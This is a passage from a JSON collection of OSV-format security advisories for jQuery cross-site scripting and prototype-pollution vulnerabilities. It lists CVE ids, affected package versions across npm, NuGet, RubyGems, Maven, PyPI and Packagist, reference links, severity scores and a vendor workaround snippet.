"http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00041.html" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/153237/RetireJS-CORS-Issue-Script-Execution.html" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/161972/Linksys-EA7500-2.0.8.194281-Cross-Site-Scripting.html" } ], "database_specific": { "cwe_ids": [ "CWE-64", "CWE-79" ], "github_reviewed": true, "github_reviewed_at": "2020-08-31T18:19:31Z", "nvd_published_at": "2018-01-18T23:29:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-579v-mp3v-rrw5", "published": "2022-05-14T01:09:51Z", "modified": "2024-12-08T05:33:53.323376Z", "aliases": [ "CVE-2011-4969" ], "summary": "jQuery vulnerable to Cross-Site Scripting (XSS)", "details": "Cross-site scripting (XSS) vulnerability in jQuery before 1.6.3, when using location.hash to select elements, allows remote attackers to inject arbitrary web script or HTML via a crafted tag.", "affected": [ { "package": { "name": "jquery", "ecosystem": "npm", "purl": "pkg:npm/jquery" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.6.3" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-579v-mp3v-rrw5/GHSA-579v-mp3v-rrw5.json" } }, { "package": { "name": "jQuery", "ecosystem": "NuGet", "purl": "pkg:nuget/jQuery" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.6.3" } ] } ], "versions": [ "1.4.1", "1.4.2", "1.4.3", "1.4.4", "1.5.0", "1.5.1", "1.5.2", "1.6.0", "1.6.1", "1.6.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-579v-mp3v-rrw5/GHSA-579v-mp3v-rrw5.json" } }, { "package": { "name": "jquery-rails", "ecosystem": "RubyGems", "purl": "pkg:gem/jquery-rails" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.0.16" } ] } ], "versions": [ "0.1.1", "0.1.2", "0.1.3", "0.2", "0.2.1", "0.2.2", "0.2.3", "0.2.4", "0.2.5", "0.2.6", "0.2.7", "1.0", "1.0.1", "1.0.10", "1.0.11", "1.0.12", "1.0.13", "1.0.14", "1.0.15", "1.0.2", "1.0.3", "1.0.4", "1.0.5", "1.0.6", "1.0.7", "1.0.8", "1.0.9", "1.0.rc" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-579v-mp3v-rrw5/GHSA-579v-mp3v-rrw5.json" } }, { "package": { "name": "org.webjars.npm:jquery", "ecosystem": "Maven", "purl": "pkg:maven/org.webjars.npm/jquery" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.6.3" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-579v-mp3v-rrw5/GHSA-579v-mp3v-rrw5.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2011-4969" }, { "type": "WEB", "url": "https://github.com/jquery/jquery/commit/db9e023e62c1ff5d8f21ed9868ab6878da2005e9" }, { "type": "PACKAGE", "url": "https://github.com/jquery/jquery" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190416-0007" }, { "type": "WEB", "url": "https://security.snyk.io/vuln/SNYK-DOTNET-JQUERY-450224" }, { "type": "WEB", "url": "http://blog.jquery.com/2011/09/01/jquery-1-6-3-released" }, { "type": "WEB", "url": "http://blog.mindedsecurity.com/2011/07/jquery-is-sink.html" }, { "type": "WEB", "url": "http://bugs.jquery.com/ticket/9521" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2013/01/31/3" }, { "type": "WEB", "url": "http://www.ubuntu.com/usn/USN-1722-1" } ], "database_specific": { "cwe_ids": [ "CWE-79" ], "github_reviewed": true, "github_reviewed_at": "2022-09-12T14:46:34Z", "nvd_published_at": "2013-03-08T22:55:00Z", "severity": "MODERATE" } }, { "schema_version": "1.7.3", "id": "GHSA-6c3j-c64m-qhgq", "published": "2019-04-26T16:29:11Z", "modified": "2025-01-15T01:41:55.110833Z", "aliases": [ "CVE-2019-11358" ], "summary": "XSS in jQuery as used in Drupal, Backdrop CMS, and other products", "details": "jQuery from 1.1.4 until 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles `jQuery.extend(true, {}, ...)` because of `Object.prototype` pollution. If an unsanitized source object contained an enumerable `__proto__` property, it could extend the native `Object.prototype`.", "affected": [ { "package": { "name": "jquery", "ecosystem": "npm", "purl": "pkg:npm/jquery" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "1.1.4" }, { "fixed": "3.4.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/04/GHSA-6c3j-c64m-qhgq/GHSA-6c3j-c64m-qhgq.json" } }, { "package": { "name": "jquery-rails", "ecosystem": "RubyGems", "purl": "pkg:gem/jquery-rails" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "4.3.4" } ] } ], "versions": [ "0.1.1", "0.1.2", "0.1.3", "0.2", "0.2.1", "0.2.2", "0.2.3", "0.2.4", "0.2.5", "0.2.6", "0.2.7", "1.0", "1.0.1", "1.0.10", "1.0.11", "1.0.12", "1.0.13", "1.0.14", "1.0.15", "1.0.16", "1.0.17", "1.0.18", "1.0.19", "1.0.2", "1.0.3", "1.0.4", "1.0.5", "1.0.6", "1.0.7", "1.0.8", "1.0.9", "1.0.rc", "2.0.1", "2.0.2", "2.0.3", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.2.0", "2.2.1", "2.2.2", "2.3.0", "3.0.0", "3.0.1", "3.0.2", "3.0.3", "3.0.4", "3.1.0", "3.1.1", "3.1.2", "3.1.3", "3.1.4", "3.1.5", "4.0.0", "4.0.0.beta1", "4.0.0.beta2", "4.0.1", "4.0.2", "4.0.3", "4.0.4", "4.0.5", "4.1.0", "4.1.1", "4.2.0", "4.2.1", "4.2.2", "4.3.0", "4.3.1", "4.3.2", "4.3.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/04/GHSA-6c3j-c64m-qhgq/GHSA-6c3j-c64m-qhgq.json" } }, { "package": { "name": "jQuery", "ecosystem": "NuGet", "purl": "pkg:nuget/jQuery" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.1.4" }, { "fixed": "3.4.0" } ] } ], "versions": [ "1.10.0", "1.10.0.1", "1.10.1", "1.10.2", "1.11.0", "1.11.1", "1.11.2", "1.11.3", "1.12.0", "1.12.1", "1.12.2", "1.12.3", "1.12.4", "1.4.1", "1.4.2", "1.4.3", "1.4.4", "1.5.0", "1.5.1", "1.5.2", "1.6.0", "1.6.1", "1.6.2", "1.6.3", "1.6.4", "1.7.0", "1.7.1", "1.7.1.1", "1.7.2", "1.8.0", "1.8.1", "1.8.2", "1.8.3", "1.9.0", "1.9.1", "2.0.0", "2.0.1", "2.0.1.1", "2.0.2", "2.0.3", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.2.0", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "3.0.0", "3.0.0.1", "3.1.0", "3.1.1", "3.2.1", "3.3.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/04/GHSA-6c3j-c64m-qhgq/GHSA-6c3j-c64m-qhgq.json" } }, { "package": { "name": "django", "ecosystem": "PyPI", "purl": "pkg:pypi/django" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0a1" }, { "fixed": "2.1.9" } ] } ], "versions": [ "2.0", "2.0.1", "2.0.10", "2.0.12", "2.0.13", "2.0.2", "2.0.3", "2.0.4", "2.0.5", "2.0.6", "2.0.7", "2.0.8", "2.0.9", "2.0a1", "2.0b1", "2.0rc1", "2.1", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.1.7", "2.1.8", "2.1a1", "2.1b1", "2.1rc1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/04/GHSA-6c3j-c64m-qhgq/GHSA-6c3j-c64m-qhgq.json" } }, { "package": { "name": "django", "ecosystem": "PyPI", "purl": "pkg:pypi/django" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.2a1" }, { "fixed": "2.2.2" } ] } ], "versions": [ "2.2", "2.2.1", "2.2a1", "2.2b1", "2.2rc1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/04/GHSA-6c3j-c64m-qhgq/GHSA-6c3j-c64m-qhgq.json" } }, { "package": { "name": "org.webjars.npm:jquery", "ecosystem": "Maven", "purl": "pkg:maven/org.webjars.npm/jquery" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.1.4" }, { "fixed": "3.4.0" } ] } ], "versions": [ "1.11.0", "1.11.1", "1.11.3", "1.12.1", "1.12.2", "1.12.3", "1.12.4", "1.7.2", "1.7.3", "1.8.2", "1.8.3", "1.9.1", "2.1.0", "2.1.1", "2.1.1-rc1", "2.1.1-rc2", "2.1.3", "2.1.4", "2.2.0", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "3.0.0", "3.0.0-alpha1", "3.0.0-beta1", "3.0.0-rc1", "3.1.0", "3.1.1", "3.2.0", "3.2.1", "3.3.0", "3.3.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/04/GHSA-6c3j-c64m-qhgq/GHSA-6c3j-c64m-qhgq.json" } }, { "package": { "name": "maximebf/debugbar", "ecosystem": "Packagist", "purl": "pkg:composer/maximebf/debugbar" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.19.0" } ] } ], "versions": [ "1.0", "1.0.1", "1.0.2", "1.0.3", "1.0.4", "1.1", "1.10.0", "1.10.1", "1.13.1", "1.2", "1.3", "1.4", "1.5", "1.5.1", "1.6", "1.6.1", "1.7", "1.7.1", "1.8", "1.9", "1.9.1", "1.9.10", "1.9.11", "1.9.12", "1.9.13", "1.9.14", "1.9.15", "1.9.2", "1.9.3", "1.9.4", "1.9.5", "1.9.6", "1.9.7", "1.9.8", "1.9.9", "v1.10.2", "v1.10.3", "v1.10.4", "v1.10.5", "v1.11.0", "v1.11.1", "v1.12.0", "v1.13.0", "v1.14.0", "v1.14.1", "v1.15.0", "v1.15.1", "v1.16.0", "v1.16.1", "v1.16.2", "v1.16.3", "v1.16.4", "v1.16.5", "v1.17.0", "v1.17.1", "v1.17.2", "v1.17.3", "v1.18.0", "v1.18.1", "v1.18.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/04/GHSA-6c3j-c64m-qhgq/GHSA-6c3j-c64m-qhgq.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-11358" }, { "type": "WEB", "url": "https://github.com/maximebf/php-debugbar/issues/447" }, { "type": "WEB", "url": "https://github.com/jquery/jquery/pull/4333" }, { "type": "WEB", "url": "https://github.com/maximebf/php-debugbar/commit/847216e60544258c881f2733d699bbcfeefac0fc" }, { "type": "WEB", "url": "https://github.com/django/django/commit/34ec52269ade54af31a021b12969913129571a3f" }, { "type": "WEB", "url": "https://github.com/django/django/commit/95649bc08547a878cebfa1d019edec8cb1b80829" }, { "type": "WEB", "url": "https://github.com/django/django/commit/baaf187a4e354bf3976c51e2c83a0d2f8ee6e6ad" }, { "type": "WEB", "url": "https://github.com/jquery/jquery/commit/753d591aea698e57d6db58c9f722cd0808619b1b" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WZW27UCJ5CYFL4KFFFMYMIBNMIU2ALG5" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4UOAZIFCSZ3ENEFOR5IXX6NFAD3HV7FA" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5IABSKTYZ5JUGL735UKGXL5YPRYOPUYI" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KYH3OAGR2RTCHRA5NOKX2TES7SNQMWGO" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QV3PKZC3PQCO3273HAT76PAQZFBEO4KP" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLXRX23725JL366CNZGJZ7AQQB7LHQ6F" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WZW27UCJ5CYFL4KFFFMYMIBNMIU2ALG5" }, { "type": "WEB", "url": "https://seclists.org/bugtraq/2019/Apr/32" }, { "type": "WEB", "url": "https://seclists.org/bugtraq/2019/Jun/12" }, { "type": "WEB", "url": "https://seclists.org/bugtraq/2019/May/18" }, { "type": "WEB", "url": "https://www.tenable.com/security/tns-2020-02" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RLXRX23725JL366CNZGJZ7AQQB7LHQ6F" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QV3PKZC3PQCO3273HAT76PAQZFBEO4KP" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KYH3OAGR2RTCHRA5NOKX2TES7SNQMWGO" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5IABSKTYZ5JUGL735UKGXL5YPRYOPUYI" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4UOAZIFCSZ3ENEFOR5IXX6NFAD3HV7FA" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/08/msg00040.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/02/msg00024.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2019/05/msg00029.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2019/05/msg00006.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b%40%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rac25da84ecdcd36f6de5ad0d255f4e967209bbbebddb285e231da37d@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://www.tenable.com/security/tns-2019-08" }, { "type": "WEB", "url": "https://www.synology.com/security/advisory/Synology_SA_19_19" }, { "type": "WEB", "url": "https://www.privacy-wise.com/mitigating-cve-2019-11358-in-old-versions-of-jquery" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.drupal.org/sa-core-2019-006" }, { "type": "WEB", "url": "https://www.djangoproject.com/weblog/2019/jun/03/security-releases" }, { "type": "WEB", "url": "https://www.debian.org/security/2019/dsa-4460" }, { "type": "WEB", "url": "https://www.debian.org/security/2019/dsa-4434" }, { "type": "WEB", "url": "https://web.archive.org/web/20190824065237/http://www.securityfocus.com/bid/108023" }, { "type": "WEB", "url": "https://supportportal.juniper.net/s/article/2021-07-Security-Bulletin-Junos-OS-Multiple-J-Web-vulnerabilities-resolved-in-Junos-OS-21-2R1" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-JQUERY-174006" }, { "type": "WEB", "url": "https://security.snyk.io/vuln/SNYK-DOTNET-JQUERY-450226" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190919-0001" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/88fb0362fd40e5b605ea8149f63241537b8b6fb5bfa315391fc5cbb7@%3Ccommits.airflow.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/88fb0362fd40e5b605ea8149f63241537b8b6fb5bfa315391fc5cbb7%40%3Ccommits.airflow.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6097cdbd6f0a337bedd9bb5cc441b2d525ff002a96531de367e4259f@%3Ccommits.airflow.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6097cdbd6f0a337bedd9bb5cc441b2d525ff002a96531de367e4259f%40%3Ccommits.airflow.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5928aa293e39d248266472210c50f176cac1535220f2486e6a7fa844@%3Ccommits.airflow.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5928aa293e39d248266472210c50f176cac1535220f2486e6a7fa844%40%3Ccommits.airflow.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/08720ef215ee7ab3386c05a1a90a7d1c852bf0706f176a7816bf65fc@%3Ccommits.airflow.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/08720ef215ee7ab3386c05a1a90a7d1c852bf0706f176a7816bf65fc%40%3Ccommits.airflow.apache.org%3E" }, { "type": "WEB", "url": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601" }, { "type": "WEB", "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/jquery-rails/CVE-2019-11358.yml" }, { "type": "WEB", "url": "https://github.com/rails/jquery-rails/blob/master/CHANGELOG.md#434" }, { "type": "PACKAGE", "url": "https://github.com/jquery/jquery" }, { "type": "WEB", "url": "https://blog.jquery.com/2019/04/10/jquery-3-4-0-released" }, { "type": "WEB", "url": "https://backdropcms.org/security/backdrop-sa-core-2019-009" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3024" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3023" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2587" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1456" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHBA-2019:1570" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rac25da84ecdcd36f6de5ad0d255f4e967209bbbebddb285e231da37d%40%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7e8ebccb7c022e41295f6fdb7b971209b83702339f872ddd8cf8bf73@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7e8ebccb7c022e41295f6fdb7b971209b83702339f872ddd8cf8bf73%40%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7d64895cc4dff84d0becfc572b20c0e4bf9bfa7b10c6f5f73e783734@%3Cdev.storm.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7d64895cc4dff84d0becfc572b20c0e4bf9bfa7b10c6f5f73e783734%40%3Cdev.storm.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7aac081cbddb6baa24b75e74abf0929bf309b176755a53e3ed810355@%3Cdev.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7aac081cbddb6baa24b75e74abf0929bf309b176755a53e3ed810355%40%3Cdev.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r41b5bfe009c845f67d4f68948cc9419ac2d62e287804aafd72892b08@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r41b5bfe009c845f67d4f68948cc9419ac2d62e287804aafd72892b08%40%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r38f0d1aa3c923c22977fe7376508f030f22e22c1379fbb155bf29766@%3Cdev.syncope.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r38f0d1aa3c923c22977fe7376508f030f22e22c1379fbb155bf29766%40%3Cdev.syncope.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2baacab6e0acb5a2092eb46ae04fd6c3e8277b4fd79b1ffb7f3254fa@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2baacab6e0acb5a2092eb46ae04fd6c3e8277b4fd79b1ffb7f3254fa%40%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2041a75d3fc09dec55adfd95d598b38d22715303f65c997c054844c9@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2041a75d3fc09dec55adfd95d598b38d22715303f65c997c054844c9%40%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3%40%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ba79cf1658741e9f146e4c59b50aee56656ea95d841d358d006c18b6@%3Ccommits.roller.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ba79cf1658741e9f146e4c59b50aee56656ea95d841d358d006c18b6%40%3Ccommits.roller.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b736d0784cf02f5a30fbb4c5902762a15ad6d47e17e2c5a17b7d6205@%3Ccommits.airflow.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b736d0784cf02f5a30fbb4c5902762a15ad6d47e17e2c5a17b7d6205%40%3Ccommits.airflow.apache.org%3E" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00006.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00025.html" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/152787/dotCMS-5.1.1-Vulnerable-Dependencies.html" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/153237/RetireJS-CORS-Issue-Script-Execution.html" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/156743/OctoberCMS-Insecure-Dependencies.html" }, { "type": "WEB", "url": "http://seclists.org/fulldisclosure/2019/May/10" }, { "type": "WEB", "url": "http://seclists.org/fulldisclosure/2019/May/11" }, { "type": "WEB", "url": "http://seclists.org/fulldisclosure/2019/May/13" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2019/06/03/2" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/108023" } ], "database_specific": { "cwe_ids": [ "CWE-1321", "CWE-79" ], "github_reviewed": true, "github_reviewed_at": "2019-04-26T16:28:41Z", "nvd_published_at": "2019-04-20T00:29:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-gxr4-xjj5-5px2", "published": "2020-04-29T22:18:55Z", "modified": "2025-01-31T20:51:56.658421Z", "aliases": [ "BIT-drupal-2020-11022", "CVE-2020-11022" ], "related": [ "CVE-2020-11022" ], "summary": "Potential XSS vulnerability in jQuery", "details": "### Impact\nPassing HTML from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. `.html()`, `.append()`, and others) may execute untrusted code.\n\n### Patches\nThis problem is patched in jQuery 3.5.0.\n\n### Workarounds\nTo workaround the issue without upgrading, adding the following to your code:\n\n```js\njQuery.htmlPrefilter = function( html ) {\n\treturn html;\n};\n```\n\nYou need to use at least jQuery 1.12/2.2 or newer to be able to apply this workaround.\n\n### References\nhttps://blog.jquery.com/2020/04/10/jquery-3-5-0-released/\nhttps://jquery.com/upgrade-guide/3.5/\n\n### For more information\nIf you have any questions or comments about this advisory, search for a relevant issue in [the jQuery repo](https://github.com/jquery/jquery/issues). If you don't find an answer, open a new issue.", "affected": [ { "package": { "name": "jquery", "ecosystem": "npm", "purl": "pkg:npm/jquery" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "1.2.0" }, { "fixed": "3.5.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/04/GHSA-gxr4-xjj5-5px2/GHSA-gxr4-xjj5-5px2.json" } }, { "package": { "name": "jquery", "ecosystem": "NuGet", "purl": "pkg:nuget/jquery" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.2.0" }, { "fixed": "3.5.0" } ] } ], "versions": [ "1.10.0", "1.10.0.1", "1.10.1", "1.10.2", "1.11.0", "1.11.1", "1.11.2", "1.11.3", "1.12.0", "1.12.1", "1.12.2", "1.12.3", "1.12.4", "1.4.1", "1.4.2", "1.4.3", "1.4.4", "1.5.0", "1.5.1", "1.5.2", "1.6.0", "1.6.1", "1.6.2", "1.6.3", "1.6.4", "1.7.0", "1.7.1", "1.7.1.1", "1.7.2", "1.8.0", "1.8.1", "1.8.2", "1.8.3", "1.9.0", "1.9.1", "2.0.0", "2.0.1", "2.0.1.1", "2.0.2", "2.0.3", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.2.0", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "3.0.0", "3.0.0.1", "3.1.0", "3.1.1", "3.2.1", "3.3.1", "3.4.0", "3.4.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/04/GHSA-gxr4-xjj5-5px2/GHSA-gxr4-xjj5-5px2.json" } }, { "package": { "name": "jquery-rails", "ecosystem": "RubyGems", "purl": "pkg:gem/jquery-rails" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "4.4.0" } ] } ], "versions": [ "0.1.1", "0.1.2", "0.1.3", "0.2", "0.2.1", "0.2.2", "0.2.3", "0.2.4", "0.2.5", "0.2.6", "0.2.7", "1.0", "1.0.1", "1.0.10", "1.0.11", "1.0.12", "1.0.13", "1.0.14", "1.0.15", "1.0.16", "1.0.17", "1.0.18", "1.0.19", "1.0.2", "1.0.3", "1.0.4", "1.0.5", "1.0.6", "1.0.7", "1.0.8", "1.0.9", "1.0.rc", "2.0.1", "2.0.2", "2.0.3", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.2.0", "2.2.1", "2.2.2", "2.3.0", "3.0.0", "3.0.1", "3.0.2", "3.0.3", "3.0.4", "3.1.0", "3.1.1", "3.1.2", "3.1.3", "3.1.4", "3.1.5", "4.0.0", "4.0.0.beta1", "4.0.0.beta2", "4.0.1", "4.0.2", "4.0.3", "4.0.4", "4.0.5", "4.1.0", "4.1.1", "4.2.0", "4.2.1", "4.2.2", "4.3.0", "4.3.1", "4.3.2", "4.3.3", "4.3.4", "4.3.5" ], "database_specific": { "source": 